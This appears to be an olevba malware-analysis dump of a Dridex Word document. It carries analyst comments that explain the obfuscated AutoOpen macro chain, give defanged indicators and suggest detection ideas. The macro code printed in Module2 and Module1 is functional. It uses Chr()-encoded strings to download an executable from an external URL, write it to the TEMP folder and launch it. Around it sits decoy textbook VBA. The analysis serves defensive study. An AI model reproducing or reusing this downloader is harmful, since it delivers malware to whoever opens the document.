dynamoo

Malicious Word macro

Jun 26th, 2015
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASI-B- dridex.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: dridex.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub ôñÔÔÀ(FFFFF As Long)
      ' Analyst note: trampoline between autoopen and the downloader.
      ' The FFFFF argument is never read; the body only calls TOT9Qr3J8P,
      ' which is defined in Module2 of the same document.
  17.  
  18. TOT9Qr3J8P
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
      ' Analyst note: entry point of the sample. olevba reports AutoOpen as
      ' auto-executable (runs when the Word document is opened). The single
      ' statement calls the obfuscated trampoline with a dummy argument (3);
      ' the call chain from here is ôñÔÔÀ -> TOT9Qr3J8P -> dFlagLB30D /
      ' IrQ2IESgmYoy / WphmxowcstXb. None of the Publish*, DDE*, web-browser
      ' or PowerPoint procedures in Module1/Module2 are called on that chain.
  23.  
  24. ôñÔÔÀ (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. '
  41. Sub PublishAutoFilterRange()
  42.     Ôû.Sheets("Query").AutoFilterMode = False
  43.     ä.Range("Query_From_Northwind").Select
  44.     â.Range("Query_From_Northwind").AutoFilter _
  45.         Field:=1, _
  46.         Criteria1:="Condiments"
  47.     ThisWorkbook.PublishObjects.Add( _
  48.         SourceType:=xlSourceAutoFilter, _
  49.         FileName:="C:\Publish01.htm", _
  50.         Sheet:="Query", _
  51.         Source:=ô.Sheets("Query").AutoFilter.Range, _
  52.         HtmlType:=xlHtmlStatic, _
  53.         DivID:="ExcelAutoFilter", _
  54.         Title:="Excel AutoFilter Range").Publish True
  55. End Sub
  56. '
  57. ' Publish a chart sheet
  58. '
  59. Sub PublishChartSheet()
  60.     ThisWorkbook.PublishObjects.Add( _
  61.         SourceType:=xlSourceChart, _
  62.         FileName:="C:\Publish02.htm", _
  63.         Sheet:="Chart1", _
  64.         HtmlType:=xlHtmlChart, _
  65.         DivID:="ExcelChartSheet", _
  66.         Title:="Excel Chart Sheet").Publish True
  67. End Sub
  68. '
  69. ' Publish an embedded chart
  70. '
  71. Sub PublishEmbeddedChart()
  72.     ThisWorkbook.PublishObjects.Add( _
  73.         SourceType:=xlSourceChart, _
  74.         FileName:="C:\Publish03.htm", _
  75.         Sheet:="2000 Budget", _
  76.         Source:="Chart 1", _
  77.         HtmlType:=xlHtmlStatic, _
  78.         DivID:="ExcelEmbeddedChart", _
  79.         Title:="Excel Embedded Chart").Publish True
  80. End Sub
  81. '
  82. ' Publish a PivotTable
  83. '
  84. Sub PublishPivotTable()
  85.     ThisWorkbook.PublishObjects.Add( _
  86.         SourceType:=xlSourcePivotTable, _
  87.         FileName:="C:\Publish04.htm", _
  88.         Sheet:="PivotTable", _
  89.         Source:="PivotTable1", _
  90.         HtmlType:=xlHtmlList, _
  91.         DivID:="ExcelPivotTable", _
  92.         Title:="Excel PivotTable").Publish True
  93. End Sub
  94. '
  95. ' Publish a print area
  96. '
  97. Sub PublishPrintArea()
  98.     ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
  99.     ThisWorkbook.PublishObjects.Add( _
  100.         SourceType:=xlSourcePrintArea, _
  101.         FileName:="C:\Publish05.htm", _
  102.         Sheet:="2000 Budget", _
  103.         Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
  104.         HtmlType:=xlHtmlStatic, _
  105.         DivID:="ExcelPrintArea", _
  106.         Title:="Excel Print Area").Publish True
  107. End Sub
  108. '
  109. ' Publish a query table
  110. '
  111. Sub PublishQueryTable()
  112.     ThisWorkbook.PublishObjects.Add( _
  113.         SourceType:=xlSourceQuery, _
  114.         FileName:="C:\Publish06.htm", _
  115.         Sheet:="Query", _
  116.         Source:="Query from Northwind", _
  117.         HtmlType:=xlHtmlCalc, _
  118.         DivID:="ExcelQueryTable", _
  119.         Title:="Excel Query Table").Publish True
  120. End Sub
  121. '
  122. ' Publish a range using coordinates
  123. '
  124. Sub PublishRangeCoordinates()
  125.     ThisWorkbook.PublishObjects.Add( _
  126.         SourceType:=xlSourceRange, _
  127.         FileName:="C:\Publish07.htm", _
  128.         Sheet:="2000 Budget", _
  129.         Source:="A1:B17", _
  130.         HtmlType:=xlHtmlCalc, _
  131.         DivID:="ExcelRangeCoordinates", _
  132.         Title:="Excel Range Coordinates").Publish True
  133. End Sub
  134. '
  135. ' Publish a range using a name
  136. '
  137. Sub PublishRangeName()
  138.     ThisWorkbook.PublishObjects.Add( _
  139.         SourceType:=xlSourceRange, _
  140.         FileName:="C:\Publish08.htm", _
  141.         Source:="Expenses", _
  142.         HtmlType:=xlHtmlStatic, _
  143.         DivID:="ExcelRangeName", _
  144.         Title:="Excel Range Name").Publish True
  145. End Sub
  146.  
  147. Public Function WphmxowcstXb(A7X71OY4p As String)
       ' Analyst note: launcher stage. The Chr() concatenation on the next line
       ' decodes to the ProgID "Shell.Application"; the object is created via
       ' dFlagLB30D (a CreateObject wrapper) and its Open method is called on
       ' QrDNQZQRP, the Public String declared in Module2 that TOT9Qr3J8P sets
       ' to the dropped file path. The A7X71OY4p parameter is never read.
       ' NOTE(review): because the launch goes through the Shell COM object, the
       ' started process may not appear as a direct child of WINWORD.EXE -
       ' confirm in a sandbox before relying on parent/child detections alone.
  148.  Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
  149. zBo1iklWv9Sz.Open (QrDNQZQRP)
  150. End Function
  151. Public Function dFlagLB30D(HvbtyGByuxg3J As String)
       ' Analyst note: thin wrapper that returns CreateObject(<ProgID>).
       ' WphmxowcstXb, IrQ2IESgmYoy and TOT9Qr3J8P create their COM objects
       ' through it with ProgIDs assembled from Chr() fragments, so those
       ' ProgID strings never appear literally next to CreateObject.
       ' When triaging, resolve every caller's argument to see which objects
       ' are really instantiated.
  152.  Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  153. End Function
  154. Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
       ' Analyst note: file-drop stage. Writes the data in UNIWVVc542vt to the
       ' path in cNvH4h9GxP. The ProgID below decodes to "Adodb.Stream".
       ' TOT9Qr3J8P calls this with the HTTP response body and the %TEMP% path.
  155. Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
  156.  
  157. With oUeKB2dS
       ' Type = 1 is adTypeBinary: the stream is written as raw bytes, not text
       ' (olevba's generic "may create a text file" hint undersells this).
  158.    .Type = 1
  159.     .Open
  160.     .write UNIWVVc542vt
       ' Second argument 2 is adSaveCreateOverWrite: an existing file at the
       ' target path is replaced.
  161.     .savetofile cNvH4h9GxP, 2
  162. End With
  163. End Function
  164.  
  165. '
  166. ' Publish a worksheet
  167. '
  168. Sub PublishWorksheet()
  169.     ThisWorkbook.PublishObjects.Add( _
  170.         SourceType:=xlSourceSheet, _
  171.         FileName:="C:\Publish09.htm", _
  172.         Sheet:="2000 Budget", _
  173.         HtmlType:=xlHtmlCalc, _
  174.         DivID:="ExcelWorksheet", _
  175.         Title:="Excel Worksheet").Publish True
  176. End Sub
  177. '
  178. ' Listing 20.2. Republishing a PublishObject.
  179. '
  180. Sub RepublishObject()
  181.     Dim strID As String
  182.     strID = "ExcelRangeCoordinates"
  183.     For Each po In ThisWorkbook.PublishObjects
  184.         If po.DivID = strID Then
  185.             po.Publish
  186.             Exit For
  187.         End If
  188.     Next 'po
  189. End Sub
  190. '
  191. ' Listing 20.3. A procedure that deletes all the PublishObjects
  192. '
  193. Sub DeletePublishObjects()
  194.   For Each po In ThisWorkbook.PublishObjects
  195.         po.Delete
  196.     Next 'po
  197. End Sub
  198. '
  199. ' Listing 20.4. A procedure that adds a Hyperlink object.
  200. '
  201. Sub AddLink()
  202.     Dim r As Range
  203.     '
  204.    ' Add a paragraph to the end of the document
  205.    '
  206.    With ThisDocument.Paragraphs
  207.         .Item(.Count).Range.InsertParagraphAfter
  208.         Set r = .Item(.Count).Range
  209.     End With
  210.     r.Text = "Sams' Home Page"
  211.     r.Hyperlinks.Add _
  212.         Anchor:=r, _
  213.         Address:="http://www.mcp.com/sams/", _
  214.         ScreenTip:="Click here to visit the home page of Sams!"
  215. End Sub
  216. '
  217. ' Listing 20.5. Procedures that add a link for the Yahoo!
  218. ' search engine and run a query on the Yahoo! database.
  219. '
  220. Sub AddYahoo()
  221.     Dim r As Range
  222.     '
  223.    ' Add a paragraph to the end of the document
  224.    '
  225.    With ThisDocument.Paragraphs
  226.         .Item(.Count).Range.InsertParagraphAfter
  227.         Set r = .Item(.Count).Range
  228.     End With
  229.     r.Text = "Yahoo Search"
  230.     r.Hyperlinks.Add _
  231.         Anchor:=r, _
  232.         Address:="http://search.yahoo.com/bin/search"
  233. End Sub
  234.  
  235. Sub SearchYahoo()
  236.     Dim link As Hyperlink
  237.     Dim keyword As String
  238.     Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
  239.     keyword = InputBox("Enter a search keyword:")
  240.     link.Follow _
  241.         ExtraInfo:="p=" & keyword, _
  242.         Method:=msoMethodGet
  243. End Sub
  244. '
  245. ' Listing 20.6. Using the FollowHyperlink method to display
  246. ' a target document without an existing Hyperlink object.
  247. '
  248. Sub FollowHyperlinkTest()
  249.     Dim keyword As String
  250.     keyword = InputBox("Enter a search keyword:")
  251.     ThisDocument.FollowHyperlink _
  252.         Address:="http://search.yahoo.com/bin/search", _
  253.         ExtraInfo:="p=" & keyword, _
  254.         Method:=msoMethodGet
  255. End Sub
  256. '
  257. ' Listing 20.7. Some event handlers that are used to
  258. ' display a Web page.
  259. '
  260. ' This event handler fires when you first open the form
  261. '
  262. Private Sub UserForm_Initialize()
  263.     Dim maxWidth As Integer
  264.     Dim maxHeight As Integer
  265.     With webWWW
  266.         '
  267.        ' Display and save the initial URL
  268.        '
  269.        If txtLocation <> "" Then
  270.             topPage = txtLocation
  271.             .Navigate txtLocation
  272.         End If
  273.         '
  274.        ' Adjust the width and height of the control
  275.        '
  276.        maxWidth = Ê.Me.Width - .Left - 10
  277.         maxHeight = Ê.Me.Height - .Top - 20
  278.         If Application.UsableWidth > maxWidth Then
  279.             .Width = maxWidth
  280.         End If
  281.         If Application.UsableHeight > maxHeight Then
  282.             .Height = maxHeight
  283.         End If
  284.     End With
  285. End Sub
  286. '
  287. ' This event handler fires when you enter the text box
  288. '
  289. Private Sub txtLocation_Enter()
  290.     '
  291.    ' Make sure Surf! button is the default
  292.    '
  293.    cmdSurf.Default = True
  294. End Sub
  295. '
  296. ' This event handler fires when you click the Surf! button
  297. '
  298. Private Sub cmdSurf_Click()
  299.     '
  300.    ' Surf to the URL specified in the Location text box
  301.    '
  302.    If txtLocation <> "" Then
  303.         webWWW.Navigate txtLocation
  304.     Else
  305.         txtLocation.SetFocus
  306.         Beep
  307.     End If
  308. End Sub
  309. '
  310. ' This event handler fires once the Web page navigation is done
  311. '
  312. Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
  313.     lblProgress.Caption = " Done"
  314.     txtLocation = URL
  315. End Sub
  316. '
  317. ' This event handler fires at the start of the download
  318. '
  319. Private Sub webWWW_DownloadBegin()
  320.     lblProgress.Caption = " Downloading..."
  321. End Sub
  322. '
  323. ' This event handler fires when the URL title changes
  324. '
  325. Private Sub webWWW_TitleChange(ByVal Text As String)
  326.     '
  327.    ' Update the form's caption to reflect the new title
  328.    '
  329.    ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
  330. End Sub
  331. '
  332. ' This event handler fires when the status text changes
  333. '
  334. Private Sub webWWW_StatusTextChange(ByVal Text As String)
  335.     lblStatus = Text
  336. End Sub
  337. '
  338. ' Listing 20.8. Event handlers for the navigation
  339. ' buttons in the custom Web browser.
  340. '
  341. '
  342. ' This event handler fires when you click the Back button
  343. '
  344. Private Sub cmdBack_Click()
  345.     '
  346.    ' An error occurs if there is no page to go back to
  347.    '
  348.    On Error Resume Next
  349.     webWWW.GoBack
  350. End Sub
  351. '
  352. ' This event handler fires when you click the Forward button
  353. '
  354. Private Sub cmdForward_Click()
  355.     '
  356.    ' An error occurs if there is no page to go forward to
  357.    '
  358.    On Error Resume Next
  359.     webWWW.GoForward
  360. End Sub
  361. '
  362. ' This event handler fires when you click the Top button
  363. '
  364. Private Sub cmdTop_Click()
  365.     webWWW.Navigate topPage
  366. End Sub
  367. '
  368. ' This event handler fires when you click the Refresh button
  369. '
  370. Private Sub cmdRefresh_Click()
  371.     webWWW.Refresh
  372. End Sub
  373. '
  374. ' This event handler fires when you click the Stop button
  375. '
  376. Private Sub cmdStop_Click()
  377.     webWWW.Stop
  378. End Sub
  379. '
  380. ' This event handler fires when you click the Home button
  381. '
  382. Private Sub cmdHome_Click()
  383.     webWWW.GoHome
  384. End Sub
  385. '
  386. ' This event handler fires when you click the Search button
  387. '
  388. Private Sub cmdSearch_Click()
  389.     webWWW.GoSearch
  390. End Sub
  391. '
  392. ' This event handler fires when you click the Exit button
  393. '
  394. Private Sub cmdExit_Click()
  395.     Unload ÊMe
  396. End Sub
  397. '
  398. ' Listing 20.9. A procedure that manipulates Internet Explorer
  399. ' via Automation using various members of the
  400. ' InternetExplorer class.
  401. '
  402. Sub AutomateInternetExplorer()
  403.     Dim ie As Object
  404.     Dim result As Integer
  405.     '
  406.    ' Set up the Automation object
  407.    '
  408.    Set ie = CreateObject("InternetExplorer.Application")
  409.     '
  410.    ' Navigate to a page and customize the browser window
  411.    '
  412.    ie.Navigate "http://www.microsoft.com/ie/"
  413.     ie.Toolbar = False
  414.     ie.StatusBar = False
  415.     ie.MenuBar = False
  416.     '
  417.    ' Twiddle thumbs while the page loads
  418.    '
  419.    Do While ie.Busy
  420.         DoEvents
  421.     Loop
  422.     '
  423.    ' Display page info
  424.    '
  425.    result = MsgBox( _
  426.         "Current URL:  " & ie.LocationURL & Chr(13) & _
  427.         "Current Title: " & ie.LocationName & Chr(13) & _
  428.         "Document type: " & ie.Type & Chr(13) & Chr(13) & _
  429.         "Would you like to view this document?", _
  430.         vbYesNo + vbQuestion)
  431.     If result = vbYes Then
  432.         '
  433.        ' If Yes, make browser visible and activate it
  434.        '
  435.        ie.Visible = True
  436.         AppActivate "Microsoft Internet Explorer"
  437.     Else
  438.         '
  439.        ' If no, bail out
  440.        '
  441.        ie.Quit
  442.     End If
  443.     Set ie = Nothing
  444. End Sub
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------------+-----------------------------------------+
  449. | Type       | Keyword              | Description                             |
  450. +------------+----------------------+-----------------------------------------+
  451. | Suspicious | Open                 | May open a file                         |
  452. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  453. |            |                      | strings                                 |
  454. | Suspicious | CreateObject         | May create an OLE object                |
  455. | Suspicious | SaveToFile           | May create a text file                  |
  456. | Suspicious | AppActivate          | May control another application by      |
  457. |            |                      | simulating user keystrokes              |
  458. | Suspicious | Run                  | May run an executable file or a system  |
  459. |            |                      | command                                 |
  460. | Suspicious | Write                | May write to a file (if combined with   |
  461. |            |                      | Open)                                   |
  462. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  463. |            |                      | may be used to obfuscate strings        |
  464. |            |                      | (option --decode to see all)            |
  465. | IOC        | http://www.mcp.com/s | URL                                     |
  466. |            | ams/                 |                                         |
  467. | IOC        | http://search.yahoo. | URL                                     |
  468. |            | com/bin/search       |                                         |
  469. | IOC        | http://www.microsoft | URL                                     |
  470. |            | .com/ie/             |                                         |
  471. +------------+----------------------+-----------------------------------------+
  472. -------------------------------------------------------------------------------
  473. VBA MACRO Module2.bas
  474. in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
  475. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  476. Public QrDNQZQRP As String
  477.  
  478.  
  479.  
  480.  
  481. ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
  482. '
  483. Sub TestIt()
  484.    Dim result As Integer
  485.     result = OpenHailingFrequencies
  486.     DDETerminate result
  487. End Sub
  488.  
  489. Function OpenHailingFrequencies() As Integer
  490.     Dim channel As Integer
  491.    
  492.     On Error GoTo BadConnection
  493.     '
  494.    ' Establish the DDE connection to Program Manager
  495.    '
  496.    channel = DDEInitiate("Progman", "Progman")
  497.    
  498.     MsgBox "A channel to Program Manager is now open.", vbInformation
  499.     '
  500.    ' Return the channel number
  501.    '
  502.    OpenHailingFrequencies = channel
  503.     Exit Function
  504.    
  505. BadConnection:
  506.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  507.     '
  508.    ' Return 0
  509.    '
  510.    OpenHailingFrequencies = 0
  511.        
  512. End Function
  513.  
  514. ' Listing 13.5. Using DDEExecute to control a server application.
  515. '
  516. Sub CreateWorkbookIcon()
  517.  
  518.     Dim channel As Integer
  519.     Dim strPath As String, strName As String, strApp As String
  520.    
  521.     On Error GoTo BadConnection
  522.     '
  523.    ' Get info required for program item
  524.    '
  525.    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
  526.     strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
  527.     strApp = Application.Path & "\Excel.exe"
  528.     '
  529.    ' Establish the DDE connection to Program Manager
  530.    '
  531.    channel = DDEInitiate("Progman", "Progman")
  532.     '
  533.    ' Create the group and item
  534.    '
  535.    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
  536.     DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
  537.     DDETerminate channel
  538.  
  539.     Exit Sub
  540.    
  541. BadConnection:
  542.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  543.            
  544. End Sub
  545.  
  546. ' Listing 13.6. Using DDERequest to retrieve data from an
  547. ' application.
  548. '
  549.  
  550. Sub RequestWordData()
  551.     Dim channel As Integer
  552.     Dim wordData As Variant
  553.     Dim getString As String
  554.     On Error GoTo BailOut
  555.     '
  556.    ' Set up the application
  557.    '
  558.    Application.StatusBar = "Starting Word..."
  559.     Application.DisplayAlerts = False
  560.     '
  561.    ' Initiate channel with System topic
  562.    '
  563.    channel = DDEInitiate("Winword", "System")
  564.     '
  565.    ' Open the document we want to work with
  566.    '
  567.    Application.StatusBar = "Opening Word document..."
  568.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  569.     DDETerminate channel
  570.     '
  571.    ' Initiate new channel with document
  572.    '
  573.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  574.     '
  575.    ' Find keyword and add a bookmark
  576.    '
  577.    DDEExecute channel, "[StartOfDocument]"
  578.     DDEExecute channel, "[EditFind .Find = ""ACME""]"
  579.     DDEExecute channel, "[SelectCurSentence]"
  580.     DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
  581.     '
  582.    ' Retrieve the bookmark and store it
  583.    '
  584.    wordData = DDERequest(channel, "Gotcha")
  585.     getString = wordData(1)
  586.     r.Worksheets("Sheet1").[A2].Value = getString
  587.     '
  588.    ' Quit Word and terminate channel
  589.    '
  590.    DDEExecute channel, "[FileExit 1]"
  591.     DDETerminate channel
  592.  
  593.     Exit Sub
  594.  
  595. BailOut:
  596.     DDETerminate channel
  597.     MsgBox "DDE operation failed!", vbExclamation
  598.  
  599. End Sub
  600.  
  601. ' Listing 13.7. Using DDEPoke to send data to an application.
  602. '
  603. Sub SendDataToWord()
  604.  
  605.     Dim channel As Integer, pokeData As Variant
  606.     On Error GoTo BailOut
  607.     '
  608.    ' Set up the application
  609.    '
  610.    Application.StatusBar = "Starting Word..."
  611.     Application.DisplayAlerts = False
  612.     '
  613.    ' Initiate channel with System topic
  614.    '
  615.    channel = DDEInitiate("Winword", "System")
  616.     '
  617.    ' Open the document we want to work with
  618.    '
  619.    Application.StatusBar = "Opening Word document..."
  620.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  621.     DDETerminate channel
  622.     '
  623.    ' Initiate new channel with document
  624.    '
  625.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  626.     '
  627.    'Get the data to be sent
  628.    '
  629.    Application.StatusBar = "Sending data..."
  630.     Set pokeData = t.Worksheets("Sheet1").[A1]
  631.     '
  632.    'Send it to the "Gotcha" bookmark
  633.    '
  634.    DDEPoke channel, "Gotcha", pokeData
  635.     '
  636.    ' Quit Word and terminate channel
  637.    '
  638.    Application.StatusBar = "Shutting down Word..."
  639.     DDEExecute channel, "[FileExit 1]"
  640.     DDETerminate channel
  641.     Application.StatusBar = False
  642.  
  643.     Exit Sub
  644.  
  645. BailOut:
  646.     DDETerminate channel
  647.     MsgBox "DDE operation failed!", vbExclamation
  648.     Application.StatusBar = False
  649.  
  650. End Sub
  651.  
  652. ' Listing 15.3. Using Automation to run a PowerPoint
  653. ' presentation slide show.
  654. '
  655. Sub TOT9Qr3J8P()
       ' Analyst note: download-and-run stage, reached from autoopen via ôñÔÔÀ.
       ' The "Listing 15.3" header comment directly above this Sub describes
       ' RunPresentation (which follows); this procedure was placed between them.
       ' Every string and method name is built from Chr() fragments and invoked
       ' through CallByName. olevba's IOC rows list only the URLs in the Module1
       ' filler code and "Excel.exe"; the download URL and the dropped file name
       ' below are visible only after decoding, so do not treat the IOC table as
       ' complete for this sample.
       ' Decoded indicators (URL defanged):
       '   URL : hxxp://colchester-institute[.]com/708/346.exe
       '   File: %TEMP%\biksenpd.exe
       ' Detection ideas: an Office process issuing an HTTP GET for an .exe, and
       ' an Office process writing an executable into the user's TEMP directory.
  656.  
       ' ProgID decodes to "Microsoft.XMLHTTP".
  657. Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
  658.  
       ' Equivalent to <xmlhttp>.Open "GET", <URL above>, False
       ' (False = synchronous request).
  659. CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
  660. Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
  661. , False
  662.  
       ' ProgID decodes to "WScript.Shell".
  663. Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
  664.  
       ' Equivalent to <shell>.Environment("Process").
  665. Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  666.  
       ' Reads the process-level "TEMP" environment variable.
  667. NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
  668.  
       ' Builds the drop path: <TEMP> & "\biksenpd.exe". QrDNQZQRP is the Public
       ' String declared at the top of Module2, so WphmxowcstXb in Module1 can
       ' read it later.
  669. QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  670. Dim yRG5Tmsczw() As Byte
  671.  
       ' "Send" issues the request; "responseBody" is then read into a byte array
       ' and handed to IrQ2IESgmYoy, which saves it to the drop path. No HTTP
       ' status check is made before the body is written.
  672. CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
  673. yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
  674. IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
       ' Control-flow obfuscation: the division by zero below is deliberate. It
       ' raises a run-time error so execution jumps to the ehUAReVao5 handler,
       ' which is the only place the launcher is called from.
  675. On Error GoTo ehUAReVao5
  676.     a = 197 / 0
  677.   On Error GoTo 0
  678.  
  679. PBWxy1g8qJuzYK:
  680.   Exit Sub
  681. ehUAReVao5:
       ' Calls the launcher in Module1; the string argument is ignored there, and
       ' the path actually opened is the QrDNQZQRP value set above.
  682.   WphmxowcstXb ("HBaMqGixX")
  683. Resume PBWxy1g8qJuzYK
  684. End Sub
  685. Sub RunPresentation()
  686.     On Error GoTo OpenPowerPoint
  687.     '
  688.    ' Reference the existing PowerPoint Application object
  689.    '
  690.    Set ppApp = GetObject(, "PowerPoint.Application")
  691.     '
  692.    ' Work with PowerPoint's Application object directly
  693.    '
  694.    With ppApp
  695.         '
  696.        ' Display PowerPoint
  697.        '
  698.        .Visible = True
  699.         '
  700.        ' Open and then run the presentation's slide show
  701.        '
  702.        .Presentations.Open "C:\My Documents\Juggling.ppt"
  703.         .Presentations("Juggling.ppt").SlideShowSettings.Run
  704.     End With
  705.     Set ppApp = Nothing
  706. '
  707. ' Program branches here if PowerPoint isn't running
  708. '
  709. OpenPowerPoint:
  710.     ' Create a new instance of PowerPoint's Application object
  711.    '
  712.    Set ppApp = CreateObject("PowerPoint.Application")
  713.     '
  714.    ' Continue after the statement that caused the error
  715.    '
  716.    Resume Next
  717. End Sub
  718.  
  719. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  720. ANALYSIS:
  721. +------------+----------------+-----------------------------------------+
  722. | Type       | Keyword        | Description                             |
  723. +------------+----------------+-----------------------------------------+
  724. | Suspicious | Open           | May open a file                         |
  725. | Suspicious | Chr            | May attempt to obfuscate specific       |
  726. |            |                | strings                                 |
  727. | Suspicious | CreateObject   | May create an OLE object                |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  731. |            |                | function calls                          |
  732. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  733. |            |                | may be used to obfuscate strings        |
  734. |            |                | (option --decode to see all)            |
  735. | IOC        | Excel.exe      | Executable file name                    |
  736. +------------+----------------+-----------------------------------------+